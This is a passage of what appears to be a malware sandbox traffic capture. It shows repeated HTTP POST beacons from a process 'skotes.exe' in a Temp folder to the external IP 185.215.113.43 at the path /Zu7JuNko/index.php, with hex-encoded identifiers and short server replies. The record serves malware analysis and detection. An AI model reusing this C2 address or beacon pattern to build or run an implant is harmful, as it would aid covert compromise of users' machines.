Dec 16, 2024 11:06:15.381506920 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:06:16.718837976 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	50250	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:18.456716061 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:06:19.789165974 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	50251	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:21.432039976 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:06:22.786612034 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	50254	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:24.528163910 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:06:25.858767033 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	50255	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:27.483369112 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:06:28.835191965 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	50256	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:30.579397917 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:06:31.909796000 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	50257	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:33.554259062 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:06:34.893692017 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	50258	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:36.636737108 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:06:37.976679087 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	50259	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:39.610901117 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:06:40.964481115 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	50260	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:42.827703953 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:06:44.168925047 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	50261	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:45.807301044 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:06:47.147063017 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	50263	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:48.884634018 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:06:50.227077007 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	50264	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:51.859610081 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:06:53.207333088 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	50265	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:54.956636906 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:06:56.299721003 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	50266	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:06:57.933573008 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:06:59.270500898 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:06:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	50267	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:01.009376049 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:07:02.344214916 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	50268	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:03.983953953 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:07:05.349153042 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	50269	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:07.101036072 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:07:08.432774067 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	50270	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:10.075352907 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:07:11.422720909 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	50271	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:13.170789957 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:07:14.512516975 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	50272	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:16.148519039 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:07:17.485543013 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	50273	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:19.223072052 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:07:20.570997000 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	50274	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:07:22.198440075 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:07:23.536988974 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:07:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	50275	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
